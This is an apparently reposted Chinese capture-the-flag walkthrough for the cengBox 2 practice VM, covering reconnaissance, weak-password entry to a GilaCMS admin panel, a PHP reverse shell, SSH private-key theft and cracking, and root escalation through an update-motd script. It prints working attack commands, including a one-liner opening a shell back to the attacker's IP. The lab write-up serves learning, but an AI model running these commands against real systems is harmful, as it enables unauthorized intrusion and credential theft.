IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> cengBox 2 靶机 wp -> 正文阅读

[PHP知识库]cengBox 2 靶机 wp

主机探活

nmap -sP 192.168.159.0/24

目标靶机IP为:192.168.159.181


端口发现

nmap -sV -p- -A 192.168.159.181

在这里插入图片描述

目标靶机开放端口为:21、22、80


21端口

nmap扫描结果显示可以匿名访问ftp服务器,访问

在这里插入图片描述


查看提示信息

在这里插入图片描述

知道了现在充值面板密码为默认密码,知道了新的域名 ceng-company.vm,知道了两个用户名KevinAaron


80端口

修改本地hosts文件

vi /etc/hosts

在这里插入图片描述


目录扫描

dirsearch -u http://ceng-company.vm 

在这里插入图片描述

只有一个页面,且访问后无有用信息


子域名

wfuzz -H 'HOST: FUZZ.ceng-company.vm' -u 'http://192.168.159.181' -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt --hw 76,53

在这里插入图片描述

找到一个子域名 admin


将其放入本地 hosts 文件,并访问

在这里插入图片描述

在这里插入图片描述

不让访问,并且扫目录也没有收获。。。

尝试了 x-forwarded-for 也不能访问


后面发现是字典太小了,重新换个大点的字典扫描

gobuster dir -u http://admin.ceng-company.vm \  
-w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt \
-x php,txt,html,js,php.bak,txt.bak,html.bak,json,git,git.bak,zip,zip.bak

在这里插入图片描述

找到一个新的目录 gila ,访问


gilaCMS

发现这个网站是一个 CMS,但是不知道版本信息

在这里插入图片描述


目录扫描看一下

在这里插入图片描述

存在admin页面,访问查看

在这里插入图片描述


根据我们之前从 ftp 上获得的信息,这里应该存在弱口令,尝试

发现用户名:Kevin@ceng-company.vm 密码:admin


反弹shell

利用弱口令成功登陆后台

在这里插入图片描述


寻找到了可以修改的php页面

在这里插入图片描述

在这里插入图片描述


将其改为 php_reverse

在这里插入图片描述


本地开启端口监听并保存触发该文件

在这里插入图片描述

成功获得shell


提权

sudo

习惯性 sudo -l 了一下,没想到真的有。。。(一般 www都没有或者需要密码)

在这里插入图片描述

可以以 swartz 用户的身份运行 runphp.sh 脚本


查看这个脚本相关信息

在这里插入图片描述

可读可执行,运行一个php环境


执行该脚本

sudo -u swartz /home/swartz/runphp.sh

在这里插入图片描述

成功进入 php 命令行模式


swartz

先弹个shell回来

$sock=fsockopen("192.168.159.131",7778);exec("/bin/sh -i <&3 >&3 2>&3");

在这里插入图片描述

成功切换到 swartz用户

在经过 suid 等一系列常规操作后没有发现什么有用的信息,因此进行信息收集

/home/mitnick目录下发现 .ssh文件夹属主可读可执行

在这里插入图片描述

而我们当前用户刚好是该属组,进入文件夹查看


ssh免密登录

发现公私钥,应该可以进行免密登录

在这里插入图片描述


开启python服务,本机下载该私钥文件

python3 -m http.server
wget 192.168.159.181:8000/id_rsa 

在这里插入图片描述


修改该私钥文件权限为 400,否则不可用

在这里插入图片描述


使用该私钥连接主机

ssh 192.168.159.181 -l mitnick -i id_rsa

在这里插入图片描述

私钥有密码。。。


# 提取私钥中的hash
ssh2john id_rsa > hash

# 暴力破解密码
john --wordlist=/usr/share/wordlists/rockyou.txt hash

在这里插入图片描述

获得密码:legend


重新连接

在这里插入图片描述

成功连接主机


上传脚本

在 mitnick 用户下进行了 suid 等一系列操作,没有发现可用信息,只能上传pspy脚本测试

wget 192.168.159.131/pspy64
chmod +x pspy64
./pspy64

在这里插入图片描述

发现两条有意思的命令

/bin/cp /var/update-motd.d/00-header /var/update-motd.d/10-help-text /var/update-motd.d/90-updates-available /var/update-motd.d/91-release-upgrade /var/update-motd.d/99-esm /etc/update-motd.d/

/bin/sh -c /bin/cp /var/update-motd.d/* /etc/update-motd.d/

这个文件看着很眼熟,是在系统启动时运行的,可以设置开机界面的显示


我们先看一看

在这里插入图片描述

在这里插入图片描述

可以看见 var 下的文件不可修改, etc 下的文件可修改

而按时运行的脚本是将 var 下的复制到 etc 下

并且这个登录显示的默认位置为 etc 下,也就是说这个可以修改的文件才是真正控制开机显示的,而cp命令大概率是为了防止它被修改


开机显示 /etc/update-motd.d/

在这里插入图片描述


修改 00-header 文件,将/bin/bash设置为suid,实现提权

chmod +s /bin/bash

在这里插入图片描述


重新ssh登录,成功获取root权限

/bin/bash -p	# -p 参数之前说过,不再详说,目的是使 euid 不失效

在这里插入图片描述

  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章      下一篇文章      查看所有文章
加:2022-10-17 12:12:45  更:2022-10-17 12:13:14 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/15 1:17:33-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码